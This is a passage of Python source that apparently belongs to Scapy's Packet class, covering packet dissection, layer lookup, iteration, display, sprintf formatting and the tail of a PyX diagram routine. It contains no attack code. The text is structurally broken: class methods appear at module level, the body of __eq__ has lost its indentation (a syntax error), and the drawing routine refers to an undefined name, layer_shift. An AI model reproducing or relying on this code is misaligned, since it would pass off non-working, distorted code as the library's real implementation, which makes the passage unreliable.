    """
    if PYX == 0:
        raise ImportError("PyX and its dependencies must be installed")
    canvas = pyx.canvas.canvas()
    if rebuild:
        # Round-trip through raw() so automatic fields are computed.
        _, t = self.__class__(raw(self)).build_ps()
    else:
        _, t = self.build_ps()
    # Total number of text rows: one per layer plus one per field.
    YTXTI = len(t)
    for _, l in t:
        YTXTI += len(l)
    YTXT = float(YTXTI)
    YDUMP = YTXT

    XSTART = 1
    XDSTART = 10
    y = 0.0
    yd = 0.0
    XMUL = 0.55
    YMUL = 0.4

    backcolor = colgen(0.6, 0.8, 1.0, trans=pyx.color.rgb)
    forecolor = colgen(0.2, 0.5, 0.8, trans=pyx.color.rgb)
# backcolor=makecol(0.376, 0.729, 0.525, 1.0)

    def hexstr(x):
        # type: (bytes) -> str
        # Space-separated lowercase hex, one pair per byte.
        return " ".join("%02x" % orb(c) for c in x)

    def make_dump_txt(x, y, txt):
        # type: (int, float, bytes) -> pyx.text.text
        # One typewriter-font hex chunk positioned in the dump column.
        return pyx.text.text(
            XDSTART + x * XMUL,
            (YDUMP - y) * YMUL,
            r"\tt{%s}" % hexstr(txt),
            [pyx.text.size.Large]
        )

    def make_box(o):
        # type: (pyx.bbox.bbox) -> pyx.bbox.bbox
        return pyx.box.rect(
            o.left(), o.bottom(), o.width(), o.height(),
            relcenter=(0.5, 0.5)
        )

    def make_frame(lst):
        # type: (List[Any]) -> pyx.path.path
        # Outline the hex chunks of one field; the shape depends on how
        # the chunks wrap across dump lines.
        if len(lst) == 1:
            b = lst[0].bbox()
            b.enlarge(pyx.unit.u_pt)
            return b.path()
        else:
            fb = lst[0].bbox()
            fb.enlarge(pyx.unit.u_pt)
            lb = lst[-1].bbox()
            lb.enlarge(pyx.unit.u_pt)
            if len(lst) == 2 and fb.left() > lb.right():
                # Two disjoint chunks on consecutive lines: two open boxes.
                return pyx.path.path(pyx.path.moveto(fb.right(), fb.top()),
                                     pyx.path.lineto(fb.left(), fb.top()),
                                     pyx.path.lineto(fb.left(), fb.bottom()),  # noqa: E501
                                     pyx.path.lineto(fb.right(), fb.bottom()),  # noqa: E501
                                     pyx.path.moveto(lb.left(), lb.top()),
                                     pyx.path.lineto(lb.right(), lb.top()),
                                     pyx.path.lineto(lb.right(), lb.bottom()),  # noqa: E501
                                     pyx.path.lineto(lb.left(), lb.bottom()))  # noqa: E501
            else:
                # XXX
                gb = lst[1].bbox()
                if gb != lb:
                    gb.enlarge(pyx.unit.u_pt)
                kb = lst[-2].bbox()
                if kb != gb and kb != lb:
                    kb.enlarge(pyx.unit.u_pt)
                return pyx.path.path(pyx.path.moveto(fb.left(), fb.top()),
                                     pyx.path.lineto(fb.right(), fb.top()),
                                     pyx.path.lineto(fb.right(), kb.bottom()),  # noqa: E501
                                     pyx.path.lineto(lb.right(), kb.bottom()),  # noqa: E501
                                     pyx.path.lineto(lb.right(), lb.bottom()),  # noqa: E501
                                     pyx.path.lineto(lb.left(), lb.bottom()),  # noqa: E501
                                     pyx.path.lineto(lb.left(), gb.top()),
                                     pyx.path.lineto(fb.left(), gb.top()),
                                     pyx.path.closepath(),)

    def make_dump(s,  # type: bytes
                  shift=0,  # type: int
                  y=0.,  # type: float
                  col=None,  # type: pyx.color.color
                  bkcol=None,  # type: pyx.color.color
                  large=16  # type: int
                  ):
        # type: (...) -> Tuple[pyx.canvas.canvas, pyx.bbox.bbox, int, float]  # noqa: E501
        # Emit the hex chunks for one field, wrapping at 16 bytes/line;
        # returns (canvas, last chunk bbox, new shift, new y).
        c = pyx.canvas.canvas()
        tlist = []
        while s:
            dmp, s = s[:large - shift], s[large - shift:]
            txt = make_dump_txt(shift, y, dmp)
            tlist.append(txt)
            shift += len(dmp)
            if shift >= 16:
                shift = 0
                y += 1
        if col is None:
            col = pyx.color.rgb.red
        if bkcol is None:
            bkcol = pyx.color.rgb.white
        c.stroke(make_frame(tlist), [col, pyx.deco.filled([bkcol]), pyx.style.linewidth.Thick])  # noqa: E501
        for txt in tlist:
            c.insert(txt)
        return c, tlist[-1].bbox(), shift, y

    last_shift, last_y = 0, 0.0
    while t:
        # t is consumed layer by layer, innermost first (pop from the end).
        bkcol = next(backcolor)
        proto, fields = t.pop()
        y += 0.5
        pt = pyx.text.text(
            XSTART,
            (YTXT - y) * YMUL,
            r"\font\cmssfont=cmss10\cmssfont{%s}" % tex_escape(
                str(proto.name)
            ),
            [pyx.text.size.Large]
        )
        y += 1
        ptbb = pt.bbox()
        ptbb.enlarge(pyx.unit.u_pt * 2)
        canvas.stroke(ptbb.path(), [pyx.color.rgb.black, pyx.deco.filled([bkcol])])  # noqa: E501
        canvas.insert(pt)
        for field, fval, fdump in fields:
            col = next(forecolor)
            ft = pyx.text.text(XSTART, (YTXT - y) * YMUL, r"\font\cmssfont=cmss10\cmssfont{%s}" % tex_escape(field.name))  # noqa: E501
            if isinstance(field, BitField):
                fsize = '%sb' % field.size
            else:
                fsize = '%sB' % len(fdump)
            if (hasattr(field, 'field') and
                    'LE' in field.field.__class__.__name__[:3] or
                    'LE' in field.__class__.__name__[:3]):
                # Little-endian fields are flagged with a leading angle mark.
                fsize = r'$\scriptstyle\langle$' + fsize
            st = pyx.text.text(XSTART + 3.4, (YTXT - y) * YMUL, r"\font\cmbxfont=cmssbx10 scaled 600\cmbxfont{%s}" % fsize, [pyx.text.halign.boxright])  # noqa: E501
            if isinstance(fval, str):
                if len(fval) > 18:
                    fval = fval[:18] + "[...]"
            else:
                fval = ""
            vt = pyx.text.text(XSTART + 3.5, (YTXT - y) * YMUL, r"\font\cmssfont=cmss10\cmssfont{%s}" % tex_escape(fval))  # noqa: E501
            y += 1.0
            if fdump:
                dt, target, last_shift, last_y = make_dump(fdump, last_shift, last_y, col, bkcol)  # noqa: E501

                dtb = target
                vtb = vt.bbox()
                bxvt = make_box(vtb)
                bxdt = make_box(dtb)
                dtb.enlarge(pyx.unit.u_pt)
                try:
                    if yd < 0:
                        cnx = pyx.connector.curve(bxvt, bxdt, absangle1=0, absangle2=-90)  # noqa: E501
                    else:
                        cnx = pyx.connector.curve(bxvt, bxdt, absangle1=0, absangle2=90)  # noqa: E501
                except Exception:
                    # PyX may fail to route a connector; the dump is still
                    # drawn, only the arrow is dropped.
                    pass
                else:
                    canvas.stroke(cnx, [pyx.style.linewidth.thin, pyx.deco.earrow.small, col])  # noqa: E501

                canvas.insert(dt)
            canvas.insert(ft)
            canvas.insert(st)
            canvas.insert(vt)
        last_y += layer_shift
    return canvas
def extract_padding(self, s):
    # type: (bytes) -> Tuple[bytes, Optional[bytes]]
    """
    DEV: to be overloaded to extract current layer's padding.
    By default a layer claims all remaining bytes and has no padding.
    :param str s: the current layer
    :return: a couple of strings (actual layer, padding)
    """
    return s, None
def post_dissect(self, s):
    # type: (bytes) -> bytes
    """DEV: is called right after the current layer has been dissected"""
    return s
def pre_dissect(self, s):
    # type: (bytes) -> bytes
    """DEV: is called right before the current layer is dissected"""
    return s
def do_dissect(self, s):
    # type: (bytes) -> bytes
    """Dissect this layer's own fields from ``s``.
    :param s: the raw bytes starting at this layer
    :return: the remaining bytes (payload of this layer)
    """
    _raw = s
    self.raw_packet_cache_fields = {}
    for f in self.fields_desc:
        if not s:
            # No bytes left: remaining fields keep their defaults.
            break
        s, fval = f.getfield(self, s)
        # Skip unused ConditionalField
        if isinstance(f, ConditionalField) and fval is None:
            continue
        # We need to track fields with mutable values to discard
        # .raw_packet_cache when needed.
        if f.islist or f.holds_packets or f.ismutable:
            self.raw_packet_cache_fields[f.name] = f.do_copy(fval)
        self.fields[f.name] = fval
    # Cache the exact bytes this layer consumed, to allow rebuilding
    # an unmodified layer without recomputation.
    self.raw_packet_cache = _raw[:-len(s)] if s else _raw
    self.explicit = 1
    return s
def do_dissect_payload(self, s):
    # type: (bytes) -> None
    """
    Perform the dissection of the layer's payload
    :param str s: the raw layer
    """
    if s:
        cls = self.guess_payload_class(s)
        try:
            p = cls(s, _internal=1, _underlayer=self)
        except KeyboardInterrupt:
            raise
        except Exception:
            if conf.debug_dissector:
                if issubtype(cls, Packet):
                    log_runtime.error("%s dissector failed", cls.__name__)
                else:
                    log_runtime.error("%s.guess_payload_class() returned "
                                      "[%s]",
                                      self.__class__.__name__, repr(cls))
                if cls is not None:
                    raise
            # Dissection failed: fall back to an opaque Raw payload so the
            # bytes are preserved instead of being lost.
            p = conf.raw_layer(s, _internal=1, _underlayer=self)
        self.add_payload(p)
def dissect(self, s):
    # type: (bytes) -> None
    """Full dissection pipeline for this layer: pre-hook, own fields,
    post-hook, then padding extraction and payload dissection."""
    s = self.pre_dissect(s)

    s = self.do_dissect(s)

    s = self.post_dissect(s)

    payl, pad = self.extract_padding(s)
    self.do_dissect_payload(payl)
    if pad and conf.padding:
        self.add_payload(conf.padding_layer(pad))
def guess_payload_class(self, payload):
    # type: (bytes) -> Type[Packet]
    """
    DEV: Guesses the next payload class from layer bonds.
    Can be overloaded to use a different mechanism.
    :param str payload: the layer's payload
    :return: the payload class
    """
    for t in self.aliastypes:
        for fval, cls in t.payload_guess:
            try:
                # A bond matches only when every bound field value equals
                # the current value on this packet.
                if all(v == self.getfieldval(k)
                       for k, v in six.iteritems(fval)):
                    return cls  # type: ignore
            except AttributeError:
                # Bound field does not exist on this packet: not a match.
                pass
    return self.default_payload_class(payload)
def default_payload_class(self, payload):
    # type: (bytes) -> Type[Packet]
    """
    DEV: Returns the default payload class if nothing has been found by the
    guess_payload_class() method.
    :param str payload: the layer's payload
    :return: the default payload class define inside the configuration file
    """
    return conf.raw_layer
def hide_defaults(self):
    # type: () -> None
    """Removes fields' values that are the same as default values."""
    # Iterate over a snapshot of the keys: self.fields is mutated below.
    for name in list(self.fields):
        if name in self.default_fields \
                and self.default_fields[name] == self.fields[name]:
            del self.fields[name]
    self.payload.hide_defaults()
def update_sent_time(self, time):
    # type: (Optional[float]) -> None
    """Use by clone_with to share the sent_time value"""
    # Intentionally a no-op; clone_with() replaces it on clones that
    # need to propagate sent_time to a parent packet.
    pass
def clone_with(self, payload=None, share_time=False, **kargs):
    # type: (Optional[Any], bool, **Any) -> Any
    """Build a new packet of the same class carrying the given field
    values (``kargs``) and copies of this packet's metadata.
    :param payload: optional payload to attach to the clone
    :param share_time: if True, bind the clone's update_sent_time so
        sending the clone also sets this packet's sent_time
    """
    pkt = self.__class__()
    pkt.explicit = 1
    pkt.fields = kargs
    pkt.default_fields = self.copy_fields_dict(self.default_fields)
    pkt.overloaded_fields = self.overloaded_fields.copy()
    pkt.time = self.time
    pkt.underlayer = self.underlayer
    pkt.post_transforms = self.post_transforms
    pkt.raw_packet_cache = self.raw_packet_cache
    pkt.raw_packet_cache_fields = self.copy_fields_dict(
        self.raw_packet_cache_fields
    )
    pkt.wirelen = self.wirelen
    if payload is not None:
        pkt.add_payload(payload)
    if share_time:
        # This binds the subpacket .sent_time to this layer
        def _up_time(x, parent=self):
            # type: (float, Packet) -> None
            parent.sent_time = x
        pkt.update_sent_time = _up_time  # type: ignore
    return pkt
def __iter__(self):
    # type: () -> Iterator[Packet]
    """Iterates through all sub-packets generated by this Packet."""
    # We use __iterlen__ as low as possible, to lower processing time
    def loop(todo, done, self=self):
        # type: (List[str], Dict[str, Any], Any) -> Iterator[Packet]
        # Recursively expand each field in `todo` over its generator
        # values; `done` accumulates the concrete values chosen so far.
        if todo:
            eltname = todo.pop()
            elt = self.getfieldval(eltname)
            if not isinstance(elt, Gen):
                # Wrap plain values so every field iterates uniformly.
                if self.get_field(eltname).islist:
                    elt = SetGen([elt])
                else:
                    elt = SetGen(elt)
            for e in elt:
                done[eltname] = e
                for x in loop(todo[:], done):
                    yield x
        else:
            if isinstance(self.payload, NoPayload):
                payloads = SetGen([None])  # type: SetGen[Packet]
            else:
                payloads = self.payload
            share_time = False
            if self.fields == done and payloads.__iterlen__() == 1:
                # In this case, the packets are identical. Let's bind
                # their sent_time attribute for sending purpose
                share_time = True
            for payl in payloads:
                # Let's make sure subpackets are consistent
                done2 = done.copy()
                for k in done2:
                    if isinstance(done2[k], VolatileValue):
                        done2[k] = done2[k]._fix()
                pkt = self.clone_with(payload=payl, share_time=share_time,
                                      **done2)
                yield pkt

    if self.explicit or self.raw_packet_cache is not None:
        # Already concrete: nothing to expand.
        todo = []
        done = self.fields
    else:
        # Expand every volatile default/overloaded field plus all
        # explicitly set fields.
        todo = [k for (k, v) in itertools.chain(six.iteritems(self.default_fields),  # noqa: E501
                                                six.iteritems(self.overloaded_fields))  # noqa: E501
                if isinstance(v, VolatileValue)] + list(self.fields)
        done = {}
    return loop(todo, done)
def __iterlen__(self):
    # type: () -> int
    """Predict the total length of the iterator"""
    fields = [key for (key, val) in itertools.chain(six.iteritems(self.default_fields),  # noqa: E501
                                                    six.iteritems(self.overloaded_fields))
              if isinstance(val, VolatileValue)] + list(self.fields)
    length = 1

    def is_valid_gen_tuple(x):
        # type: (Any) -> bool
        # A (start, stop) pair of ints denotes an inclusive integer range.
        if not isinstance(x, tuple):
            return False
        return len(x) == 2 and all(isinstance(z, int) for z in x)

    for field in fields:
        fld, val = self.getfield_and_val(field)
        if hasattr(val, "__iterlen__"):
            length *= val.__iterlen__()
        elif is_valid_gen_tuple(val):
            length *= (val[1] - val[0] + 1)
        elif isinstance(val, list) and not fld.islist:
            # A list on a scalar field enumerates alternatives; count the
            # expansion of each alternative.
            len2 = 0
            for x in val:
                if hasattr(x, "__iterlen__"):
                    len2 += x.__iterlen__()
                elif is_valid_gen_tuple(x):
                    len2 += (x[1] - x[0] + 1)
                elif isinstance(x, list):
                    len2 += len(x)
                else:
                    len2 += 1
            length *= len2 or 1
    if not isinstance(self.payload, NoPayload):
        return length * self.payload.__iterlen__()
    return length
def iterpayloads(self):
    # type: () -> Iterator[Packet]
    """Used to iter through the payloads of a Packet.
    Useful for DNS or 802.11 for instance.
    """
    layer = self
    yield layer
    # Walk down the payload chain until a falsy payload (NoPayload).
    while layer.payload:
        layer = layer.payload
        yield layer
def __gt__(self, other):
    # type: (Packet) -> int
    """True if other is an answer from self (self ==> other)."""
    # Delegate to __lt__ with operands swapped for Packet operands.
    if isinstance(other, Packet):
        return other < self
    if isinstance(other, bytes):
        return 1
    raise TypeError((self, other))
def __lt__(self, other):
    # type: (Packet) -> int
    """True if self is an answer from other (other ==> self)."""
    if isinstance(other, Packet):
        return self.answers(other)
    if isinstance(other, bytes):
        return 1
    raise TypeError((self, other))
def __eq__(self, other):
# type: (Any) -> bool
if not isinstance(other, self.__class__):
return False
for f in self.fields_desc:
if f not in other.fields_desc:
return False
if self.getfieldval(f.name) != other.getfieldval(f.name):
return False
return self.payload == other.payload
def __ne__(self, other):
    # type: (Any) -> bool
    """Inequality is defined as the negation of __eq__ (py2 compat)."""
    return not self.__eq__(other)
# Note: setting __hash__ to None is the standard way
# of making an object un-hashable. mypy doesn't know that.
# Packets define __eq__ and are mutable, so they must not be hashable.
__hash__ = None  # type: ignore
def hashret(self):
    # type: () -> bytes
    """DEV: returns a string that has the same value for a request
    and its answer."""
    return self.payload.hashret()
def answers(self, other):
    # type: (Packet) -> int
    """DEV: true if self is an answer from other"""
    # Same layer class on both sides: defer the decision to the payloads.
    if other.__class__ != self.__class__:
        return 0
    return self.payload.answers(other.payload)
def layers(self):
    # type: () -> List[Type[Packet]]
    """returns a list of layer classes (including subclasses) in this packet"""  # noqa: E501
    result = []
    current = self  # type: Optional[Packet]
    # Walk the payload chain, collecting each layer's class.
    while current:
        result.append(current.__class__)
        current = current.payload.getlayer(0, _subclass=True)
    return result
def haslayer(self, cls, _subclass=None):
    # type: (Union[Type[Packet], str], Optional[bool]) -> int
    """
    true if self has a layer that is an instance of cls.
    Superseded by "cls in self" syntax.
    """
    if _subclass is None:
        _subclass = self.match_subclass or None
    if _subclass:
        match = issubtype
    else:
        match = lambda cls1, cls2: bool(cls1 == cls2)
    # cls may be a class or a class-name string; match either way.
    if cls is None or match(self.__class__, cls) \
       or cls in [self.__class__.__name__, self._name]:
        return True
    # Also search inside fields that hold packets (e.g. PacketListField).
    for f in self.packetfields:
        fvalue_gen = self.getfieldval(f.name)
        if fvalue_gen is None:
            continue
        if not f.islist:
            fvalue_gen = SetGen(fvalue_gen, _iterpacket=0)
        for fvalue in fvalue_gen:
            if isinstance(fvalue, Packet):
                ret = fvalue.haslayer(cls, _subclass=_subclass)
                if ret:
                    return ret
    return self.payload.haslayer(cls, _subclass=_subclass)
def getlayer(self,
             cls,  # type: Union[int, Type[Packet], str]
             nb=1,  # type: int
             _track=None,  # type: Optional[List[int]]
             _subclass=None,  # type: Optional[bool]
             **flt  # type: Any
             ):
    # type: (...) -> Optional[Packet]
    """Return the nb^th layer that is an instance of cls, matching flt
    values.
    """
    if _subclass is None:
        _subclass = self.match_subclass or None
    if _subclass:
        match = issubtype
    else:
        match = lambda cls1, cls2: bool(cls1 == cls2)
    # Note:
    #  cls can be int, packet, str
    #  string_class_name can be packet, str (packet or packet+field)
    #  class_name can be packet, str (packet only)
    if isinstance(cls, int):
        # An int means "the nb^th layer of any class" (0-based).
        nb = cls + 1
        string_class_name = ""  # type: Union[Type[Packet], str]
    else:
        string_class_name = cls
    class_name = ""  # type: Union[Type[Packet], str]
    fld = None  # type: Optional[str]
    if isinstance(string_class_name, str) and "." in string_class_name:
        # "Class.field" syntax: return the field value, not the layer.
        class_name, fld = string_class_name.split(".", 1)
    else:
        class_name, fld = string_class_name, None
    if not class_name or match(self.__class__, class_name) \
       or class_name in [self.__class__.__name__, self._name]:
        if all(self.getfieldval(fldname) == fldvalue
               for fldname, fldvalue in six.iteritems(flt)):
            if nb == 1:
                if fld is None:
                    return self
                else:
                    return self.getfieldval(fld)  # type: ignore
            else:
                nb -= 1
    # Recurse into packet-holding fields before the payload chain.
    for f in self.packetfields:
        fvalue_gen = self.getfieldval(f.name)
        if fvalue_gen is None:
            continue
        if not f.islist:
            fvalue_gen = SetGen(fvalue_gen, _iterpacket=0)
        for fvalue in fvalue_gen:
            if isinstance(fvalue, Packet):
                track = []  # type: List[int]
                ret = fvalue.getlayer(class_name, nb=nb, _track=track,
                                      _subclass=_subclass, **flt)
                if ret is not None:
                    return ret
                # The recursion consumed some matches: resume counting
                # from where it stopped.
                nb = track[0]
    return self.payload.getlayer(class_name, nb=nb, _track=_track,
                                 _subclass=_subclass, **flt)
def firstlayer(self):
    # type: () -> Packet
    """Return the bottom-most layer by walking up the underlayer chain."""
    layer = self
    while layer.underlayer is not None:
        layer = layer.underlayer
    return layer
def __getitem__(self, cls):
    # type: (Union[Type[Packet], str]) -> Any
    """Layer lookup: ``pkt[Cls]``, or ``pkt[Cls:nb]`` / ``pkt[Cls:nb:flt]``
    via slice syntax. Raises IndexError when the layer is absent."""
    if isinstance(cls, slice):
        lname = cls.start
        if cls.stop:
            ret = self.getlayer(cls.start, nb=cls.stop, **(cls.step or {}))
        else:
            ret = self.getlayer(cls.start, **(cls.step or {}))
    else:
        lname = cls
        ret = self.getlayer(cls)
    if ret is None:
        if isinstance(lname, type):
            name = lname.__name__
        elif not isinstance(lname, bytes):
            name = repr(lname)
        else:
            name = cast(str, lname)
        raise IndexError("Layer [%s] not found" % name)
    return ret
def __delitem__(self, cls):
    # type: (Type[Packet]) -> None
    """Remove the given layer (and everything above it) from the packet."""
    del(self[cls].underlayer.payload)
def __setitem__(self, cls, val):
    # type: (Type[Packet], Packet) -> None
    """Replace the given layer (and everything above it) with ``val``."""
    self[cls].underlayer.payload = val
def __contains__(self, cls):
    # type: (Union[Type[Packet], str]) -> int
    """
    "cls in self" returns true if self has a layer which is an
    instance of cls.
    """
    return self.haslayer(cls)
def route(self):
    # type: () -> Tuple[Any, Optional[str], Optional[str]]
    """Delegate routing decision to the payload chain."""
    return self.payload.route()
def fragment(self, *args, **kargs):
    # type: (*Any, **Any) -> List[Packet]
    """Delegate fragmentation to the payload chain."""
    return self.payload.fragment(*args, **kargs)
def display(self, *args, **kargs):  # Deprecated. Use show()
    # type: (*Any, **Any) -> None
    """Deprecated. Use show() method."""
    self.show(*args, **kargs)
def _show_or_dump(self,
                  dump=False,  # type: bool
                  indent=3,  # type: int
                  lvl="",  # type: str
                  label_lvl="",  # type: str
                  first_call=True  # type: bool
                  ):
    # type: (...) -> Optional[str]
    """
    Internal method that shows or dumps a hierarchical view of a packet.
    Called by show.
    :param dump: determine if it prints or returns the string value
    :param int indent: the size of indentation for each layer
    :param str lvl: additional information about the layer lvl
    :param str label_lvl: additional information about the layer fields
    :param first_call: determine if the current function is the first
    :return: return a hierarchical view if dump, else print it
    """
    if dump:
        from scapy.themes import AnsiColorTheme
        ct = AnsiColorTheme()  # No color for dump output
    else:
        ct = conf.color_theme
    # Layer banner: ###[ LayerName ]###
    s = "%s%s %s %s \n" % (label_lvl,
                           ct.punct("###["),
                           ct.layer_name(self.name),
                           ct.punct("]###"))
    for f in self.fields_desc:
        if isinstance(f, ConditionalField) and not f._evalcond(self):
            # Field not present under the current condition: skip it.
            continue
        if isinstance(f, Emph) or f in conf.emph:
            ncol = ct.emph_field_name
            vcol = ct.emph_field_value
        else:
            ncol = ct.field_name
            vcol = ct.field_value
        fvalue = self.getfieldval(f.name)
        if isinstance(fvalue, Packet) or (f.islist and f.holds_packets and isinstance(fvalue, list)):  # noqa: E501
            # Packet-valued field: recurse with a deeper label prefix.
            pad = max(0, 10 - len(f.name)) * " "
            s += "%s  \\%s%s\\\n" % (label_lvl + lvl, ncol(f.name), pad)
            fvalue_gen = SetGen(
                fvalue,
                _iterpacket=0
            )  # type: SetGen[Packet]
            for fvalue in fvalue_gen:
                s += fvalue._show_or_dump(dump=dump, indent=indent, label_lvl=label_lvl + lvl + "   |", first_call=False)  # noqa: E501
        else:
            pad = max(0, 10 - len(f.name)) * " "
            begn = "%s  %s%s%s " % (label_lvl + lvl,
                                    ncol(f.name),
                                    pad,
                                    ct.punct("="),)
            reprval = f.i2repr(self, fvalue)
            if isinstance(reprval, str):
                # Align continuation lines under the value column.
                reprval = reprval.replace("\n", "\n" + " " * (len(label_lvl) +  # noqa: E501
                                                              len(lvl) +
                                                              len(f.name) +
                                                              4))
            s += "%s%s\n" % (begn, vcol(reprval))
    if self.payload:
        s += self.payload._show_or_dump(  # type: ignore
            dump=dump,
            indent=indent,
            lvl=lvl + (" " * indent * self.show_indent),
            label_lvl=label_lvl,
            first_call=False
        )

    if first_call and not dump:
        print(s)
        return None
    else:
        return s
def show(self, dump=False, indent=3, lvl="", label_lvl=""):
    # type: (bool, int, str, str) -> Optional[Any]
    """
    Prints or returns (when "dump" is true) a hierarchical view of the
    packet.
    :param dump: determine if it prints or returns the string value
    :param int indent: the size of indentation for each layer
    :param str lvl: additional information about the layer lvl
    :param str label_lvl: additional information about the layer fields
    :return: return a hierarchical view if dump, else print it
    """
    return self._show_or_dump(dump, indent, lvl, label_lvl)
def show2(self, dump=False, indent=3, lvl="", label_lvl=""):
    # type: (bool, int, str, str) -> Optional[Any]
    """
    Prints or returns (when "dump" is true) a hierarchical view of an
    assembled version of the packet, so that automatic fields are
    calculated (checksums, etc.)
    :param dump: determine if it prints or returns the string value
    :param int indent: the size of indentation for each layer
    :param str lvl: additional information about the layer lvl
    :param str label_lvl: additional information about the layer fields
    :return: return a hierarchical view if dump, else print it
    """
    # Rebuild through raw() so computed fields show their final values.
    return self.__class__(raw(self)).show(dump, indent, lvl, label_lvl)
def sprintf(self, fmt, relax=1):
    # type: (str, int) -> str
    """
    sprintf(format, [relax=1]) -> str

    Where format is a string that can include directives. A directive
    begins and ends by % and has the following format:
    ``%[fmt[r],][cls[:nb].]field%``

    :param fmt: is a classic printf directive, "r" can be appended for raw
      substitution:
      (ex: IP.flags=0x18 instead of SA), nb is the number of the layer
      (ex: for IP/IP packets, IP:2.src is the src of the upper IP layer).
      Special case : "%.time%" is the creation time.
      Ex::

        p.sprintf(
            "%.time% %-15s,IP.src% -> %-15s,IP.dst% %IP.chksum% "
            "%03xr,IP.proto% %r,TCP.flags%"
        )

      Moreover, the format string can include conditional statements. A
      conditional statement looks like : {layer:string} where layer is a
      layer name, and string is the string to insert in place of the
      condition if it is true, i.e. if layer is present. If layer is
      preceded by a "!", the result is inverted. Conditions can be
      imbricated. A valid statement can be::

        p.sprintf("This is a{TCP: TCP}{UDP: UDP}{ICMP:n ICMP} packet")
        p.sprintf("{IP:%IP.dst% {ICMP:%ICMP.type%}{TCP:%TCP.dport%}}")

    A side effect is that, to obtain "{" and "}" characters, you must use
    "%(" and "%)".
    """
    escape = {"%": "%",
              "(": "{",
              ")": "}"}

    # Evaluate conditions
    # Innermost-first: rindex("{") finds the deepest opening brace.
    while "{" in fmt:
        i = fmt.rindex("{")
        j = fmt[i + 1:].index("}")
        cond = fmt[i + 1:i + j + 1]
        k = cond.find(":")
        if k < 0:
            raise Scapy_Exception("Bad condition in format string: [%s] (read sprintf doc!)" % cond)  # noqa: E501
        cond, format_ = cond[:k], cond[k + 1:]
        res = False
        if cond[0] == "!":
            # "!" inverts the layer-presence test.
            res = True
            cond = cond[1:]
        if self.haslayer(cond):
            res = not res
        if not res:
            format_ = ""
        fmt = fmt[:i] + format_ + fmt[i + j + 2:]

    # Evaluate directives
    s = ""
    while "%" in fmt:
        i = fmt.index("%")
        s += fmt[:i]
        fmt = fmt[i + 1:]
        if fmt and fmt[0] in escape:
            # "%%", "%(" and "%)" are literal escapes.
            s += escape[fmt[0]]
            fmt = fmt[1:]
            continue
        try:
            # Parse one "%[fmt[r],][cls[:nb].]field%" directive.
            i = fmt.index("%")
            sfclsfld = fmt[:i]
            fclsfld = sfclsfld.split(",")
            if len(fclsfld) == 1:
                f = "s"
                clsfld = fclsfld[0]
            elif len(fclsfld) == 2:
                f, clsfld = fclsfld
            else:
                raise Scapy_Exception
            if "." in clsfld:
                cls, fld = clsfld.split(".")
            else:
                cls = self.__class__.__name__
                fld = clsfld
            num = 1
            if ":" in cls:
                cls, snum = cls.split(":")
                num = int(snum)
            fmt = fmt[i + 1:]
        except Exception:
            raise Scapy_Exception("Bad format string [%%%s%s]" % (fmt[:25], fmt[25:] and "..."))  # noqa: E501
        else:
            if fld == "time":
                # Creation time with microsecond precision.
                val = time.strftime(
                    "%H:%M:%S.%%06i",
                    time.localtime(float(self.time))
                ) % int((self.time - int(self.time)) * 1000000)
            elif cls == self.__class__.__name__ and hasattr(self, fld):
                if num > 1:
                    # Not this occurrence of the layer: recurse with nb-1.
                    val = self.payload.sprintf("%%%s,%s:%s.%s%%" % (f, cls, num - 1, fld), relax)  # noqa: E501
                    f = "s"
                elif f[-1] == "r":  # Raw field value
                    val = getattr(self, fld)
                    f = f[:-1]
                    if not f:
                        f = "s"
                else:
                    val = getattr(self, fld)
                    if fld in self.fieldtype:
                        val = self.fieldtype[fld].i2repr(self, val)
            else:
                # Not our layer: let the payload resolve the directive.
                val = self.payload.sprintf("%%%s%%" % sfclsfld, relax)
                f = "s"
            s += ("%" + f) % val

    s += fmt
    return s
def mysummary(self):
    # type: () -> str
    """DEV: can be overloaded to return a string that summarizes the layer.
    Only one mysummary() is used in a whole packet summary: the one of the upper layer,  # noqa: E501
    except if a mysummary() also returns (as a couple) a list of layers whose  # noqa: E501
    mysummary() must be called if they are present."""
    return ""
def _do_summary(self):
    # type: () -> Tuple[int, str, List[Any]]
    """Build the summary bottom-up: payloads summarize first, and this
    layer contributes only if no upper layer did (or if an upper layer
    explicitly requested it through its `needed` list).
    :return: (found flag, summary string so far, needed layer classes)
    """
    found, s, needed = self.payload._do_summary()
    ret = ""
    if not found or self.__class__ in needed:
        ret = self.mysummary()
        if isinstance(ret, tuple):
            # mysummary may return (text, [layers whose summary is needed]).
            ret, n = ret
            needed += n
    if ret or needed:
        found = 1
    if not ret:
        ret = self.__class__.__name__ if self.show_summary else ""
    if self.__class__ in conf.emph:
        # Append emphasized field values for highlighted layer classes.
        impf = []
        for f in self.fields_desc:
            if f in conf.emph:
                impf.append("%s=%s" % (f.name, f.i2repr(self, self.getfieldval(f.name))))  # noqa: E501
        ret = "%s [%s]" % (ret, " ".join(impf))
    if ret and s:
        ret = "%s / %s" % (ret, s)
    else:
        ret = "%s%s" % (ret, s)
    return found, ret, needed
def summary(self, intern=0):
    # type: (int) -> str
    """Prints a one line summary of a packet."""
    # NOTE(review): `intern` is unused here — presumably kept for
    # backward compatibility with older callers; confirm before removing.
    return self._do_summary()[1]
def lastlayer(self, layer=None):
    # type: (Optional[Packet]) -> Packet
    """Returns the upper-most (last) layer of the packet"""
    return self.payload.lastlayer(self)
def decode_payload_as(self, cls):
    # type: (Type[Packet]) -> None
    """Reassembles the payload and decode it using another packet class"""
    s = raw(self.payload)
    self.payload = cls(s, _internal=1, _underlayer=self)
    # Notify the whole stack, starting from the bottom layer, that
    # dissection is complete again.
    pp = self
    while pp.underlayer is not None:
        pp = pp.underlayer
    self.payload.dissection_done(pp)
def command(self):
    # type: () -> str
    """
    Returns a string representing the command you have to type to
    obtain the same packet
    """
    f = []
    for fn, fv in six.iteritems(self.fields):
        fld = self.get_field(fn)
        if isinstance(fv, (list, dict, set)) and len(fv) == 0:
            # Empty containers add noise without changing the packet.
            continue
        if isinstance(fv, Packet):
            fv = fv.command()
        elif fld.islist and fld.holds_packets and isinstance(fv, list):
            fv = "[%s]" % ",".join(map(Packet.command, fv))
        elif isinstance(fld, FlagsField):
            fv = int(fv)
        elif callable(getattr(fv, 'command', None)):
            fv = fv.command()
        else:
            fv = repr(fv)
        f.append("%s=%s" % (fn, fv))
    c = "%s(%s)" % (self.__class__.__name__, ", ".join(f))
    pc = self.payload.command()
    if pc:
        # Layers are chained with the / operator, as at the prompt.
        c += "/" + pc
    return c
def convert_to(self, other_cls, **kwargs):
    # type: (Type[Packet], **Any) -> Packet
    """Converts this Packet to another type.
    This is not guaranteed to be a lossless process.
